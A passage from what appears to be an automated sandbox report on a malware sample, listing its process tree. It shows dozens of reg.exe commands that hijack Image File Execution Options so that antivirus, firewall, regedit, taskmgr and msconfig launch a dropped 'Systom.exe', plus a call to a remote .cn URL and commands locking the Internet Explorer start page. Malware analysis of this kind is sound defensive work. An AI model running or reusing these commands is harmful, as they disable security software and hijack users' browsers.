    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:3004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:908
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.1390578.cn/tj.asp
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:2396
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
